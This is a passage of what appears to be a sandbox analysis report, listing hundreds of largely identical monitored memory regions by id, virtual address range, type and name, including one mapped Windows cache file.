0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 982 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 983 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 984 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 985 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 986 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 987 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 988 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 989 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 990 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 991 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 992 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 993 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 994 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 995 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 996 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 997 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 998 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 999 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1000 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1001 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1002 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1003 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1004 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1005 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1006 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1007 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1008 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1009 start_va = 0x1e90000 end_va = 0x1e90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1010 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1011 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1012 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1013 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1014 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1015 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1016 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1017 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1018 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1019 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1020 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1021 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1022 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1023 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1024 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1025 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1026 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1027 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1028 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1029 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1030 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1031 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1032 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1033 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1034 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1035 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1036 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1037 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1038 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1039 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1040 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1041 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1042 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1043 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1044 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1045 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1046 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1047 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1048 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1049 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1050 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1051 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1052 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1053 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1054 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1055 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1056 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1057 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1058 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1059 start_va = 0x1e90000 end_va = 0x1e90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1060 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1061 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1062 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1063 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1064 start_va = 0x1e90000 end_va = 0x1e90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1065 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1066 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1067 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1068 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1069 start_va = 0x1e90000 end_va = 0x1e90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1070 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1071 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1072 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1073 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1074 start_va = 0x1e90000 end_va = 0x1e90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1075 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1076 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1077 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1078 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1079 start_va = 0x1e90000 end_va = 0x1e90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1080 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1081 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1082 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1083 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1084 start_va = 0x1e90000 end_va = 0x1e90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1085 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1086 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1087 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1088 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1089 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1090 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1091 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1092 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1093 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1094 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1095 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1096 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1097 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1098 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1099 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1100 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1101 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1102 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1103 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1104 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1105 start_va = 0x1e90000 end_va = 0x1e90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1106 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1107 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1108 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1109 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1110 start_va = 0x1e90000 end_va = 0x1e90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1111 start_va = 0x1e90000 end_va = 0x1e93fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1112 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1113 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1114 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1115 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1116 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1117 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1118 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1119 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1120 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1121 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1122 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1123 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1124 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1125 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1126 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1127 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1128 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1129 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1130 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1131 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1132 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1133 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1134 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1135 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1136 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1137 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1138 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1139 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1140 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1141 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1142 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1143 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1144 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1145 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1146 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1147 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1148 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1149 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1150 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1151 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1152 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1153 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1154 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1155 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1156 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1157 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1158 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1159 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1160 start_va = 0x1e90000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1161 start_va = 0x3ed0000 end_va = 0x3eebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 1162 start_va = 0x1e90000 end_va = 0x1e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 1163 start_va = 